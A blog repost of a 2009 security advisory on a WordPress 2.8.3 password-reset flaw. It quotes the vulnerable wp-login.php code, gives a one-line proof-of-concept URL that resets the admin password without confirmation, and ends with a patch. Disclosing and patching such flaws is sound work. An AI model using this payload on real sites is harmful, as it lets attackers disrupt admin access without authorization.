Saturday, May 1, 2010

Wordpress 2.8.3 bug = Remote Admin Reset Password Vulnerability


WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

DESCRIPTION

The way Wordpress handle a password reset looks like this:
You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then Wordpress reset your admin password, and
sends you over another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace('/[^a-z0-9]/i', '', $key);

if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));

$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....

line 370:

break;

case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}

wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();

break;
...[snip ]...

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.


PROOF OF CONCEPT

A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation. 
 
RxN7 in action:
http://offlinephobia.uni.cc/gallery/208-2/powered+by+wp283.jpg
 http://offlinephobia.uni.cc/gallery/212-2/bug+is+exploit.jpg
 http://offlinephobia.uni.cc/gallery/215-2/result.jpg
how to patch:
 
1. by upgrading the version of wordpress ... go here http://wordpress.org/download/
 
2. changing the php code in wp-login.php
 
before:
case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);
 
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
 
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
 
break;
 
 
after: 
case 'resetpass' :
case 'rp' :
if (is_array($_GET['key'])) {
die("Hacking detected.");
exit();
}
$errors = reset_password($_GET['key']);
 
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
 
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
 
break;
 
 
=================================================================
 
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié

No comments:

Post a Comment